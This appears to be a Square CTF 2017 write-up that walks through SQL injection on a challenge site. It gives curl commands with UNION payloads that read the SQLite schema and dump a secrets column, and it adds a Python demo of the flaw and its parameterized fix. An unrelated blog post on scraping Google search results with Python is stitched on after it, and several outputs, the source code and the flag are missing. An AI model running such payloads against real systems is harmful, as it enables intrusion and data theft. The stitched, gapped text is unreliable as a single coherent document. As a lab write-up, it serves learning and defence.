Write-up: Little Doggy Tables, Square CTF 2017

This is a write-up for the challenge Little Doggy Tables from Square CTF 2017.

The challenge can be found here: https://squarectf.com/challenges/little-doggy-tables

The challenge requires us to use SQL injection to extract the flag from a table in the database.

On running this command:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=Fido"

I got the following output:


Which means I can run SQL queries through this command.

Furthermore, the challenge details also include the source code, which looks like this:

From checking out the source code it is obvious that SQL injection is possible and that SQLite3 was used in the database.

To check if it was working, I ran:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename='"

Which gave this output:

Internal Server Error

unrecognized token: "'\";"

WEBrick/1.3.1 (Ruby/2.3.4/2017-03-30) at little-doggy-tables.capturethesquare.com:443

Now that I knew SQL injection was working, I had to access the metadata. Unfortunately, the information_schema table does not exist here since it is SQLite and not MySQL. I searched for an equivalent table in SQLite and came across this question on Stack Overflow:

Which gave me enough to realize that sqlite_master is the information_schema alternative in SQLite. I changed the commands mentioned in the answer to suit my search.

All metadata in SQLite can be accessed simply by using the command:

select sql from sqlite_master

So I modified my payload to:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=' union select sql from sqlite_master-- -"

Which gave the output:

CREATE TABLE operatives (
codename TEXT,
species TEXT,
secret TEXT

Now we know both the name of the table and the name of the required column, which is obviously secret. The SQL query that now needs to be executed is:

select group_concat(secret) from operatives

The corresponding payload would be:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=' union select group_concat(secret) from operatives-- -"

The resulting output:


On refining the above output we get that the flag is:
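
The root cause and its fix, as an added example that is not the challenge's source code: a Python sqlite3 stand-in that runs the two UNION payloads above against a string-built query and against a parameterized one. The single-column query shape, the function names and the table rows are assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the challenge database; all rows are constructed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE operatives (codename TEXT, species TEXT, secret TEXT)")
    db.executemany(
        "INSERT INTO operatives VALUES (?, ?, ?)",
        [("Fido", "dog", "constructed-secret-1"),
         ("Rex", "dog", "constructed-secret-2")],
    )
    return db

def lookup_vulnerable(db, codename):
    # Assumed shape of the flaw: user input is spliced into the SQL text,
    # so a quote in `codename` ends the literal and the rest runs as SQL.
    query = "SELECT species FROM operatives WHERE codename = '%s';" % codename
    return [row[0] for row in db.execute(query)]

def lookup_parameterized(db, codename):
    # The value is bound separately from the statement, so it is only ever
    # compared as data, whatever characters it contains.
    query = "SELECT species FROM operatives WHERE codename = ?;"
    return [row[0] for row in db.execute(query, (codename,))]

# The two payloads from the write-up.
SCHEMA_PAYLOAD = "' union select sql from sqlite_master-- -"
SECRET_PAYLOAD = "' union select group_concat(secret) from operatives-- -"

if __name__ == "__main__":
    db = make_db()
    for name in ("Fido", "'", SCHEMA_PAYLOAD, SECRET_PAYLOAD):
        for fn in (lookup_vulnerable, lookup_parameterized):
            try:
                result = fn(db, name)
            except sqlite3.Error as exc:
                result = "error: %s" % exc
            print("%-22s %-50r -> %r" % (fn.__name__, name, result))
```

With the bound parameter, the lone quote and both payloads are treated as codenames that match no row, so the lookup returns an empty result instead of an error or leaked data.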



Google Search Scraping With Python

Python is a language that allows you to do great things with very little code, and it has a great set of powerful libraries and packages. I hope to illustrate this here by demonstrating how you can scrape results off a Google search using a very simple and short Python script. Older versions of such scripts depended on the Google AJAX API, which no longer works; this is an alternative approach.

The way this piece of code works is by using the two modules ‘urllib’ and ‘requests’. These two modules are at the centre of this piece of code. The ‘get’ function of the ‘requests’ module is what allows you to access the specified url and the ‘urllib’ module allows you to read the urls on the page and store/output them.

For this code to work, you will also need the lxml library and the CSSselect Python package. These are needed to process the formatting of the results page. lxml does not need any installation and is widely used in Python scripts. You can download their package, and read their documentation here: http://lxml.de/

Now for CSSselect, you might get this error if the package is not installed on your system:

To fix this you might want to download the CSSselect package, which you can do from here: https://pypi.python.org/pypi/cssselect

To install this package run this command from the directory where the downloaded .whl file is located:

After doing so, you can run the script and/or use it in your own programs to scrape Google search results. Have fun!